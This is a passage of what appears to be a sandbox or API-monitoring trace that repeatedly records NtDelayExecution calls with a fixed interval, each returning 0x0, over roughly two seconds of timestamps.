(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.937] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0171.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.273] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0172.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.109] NtDelayExecution 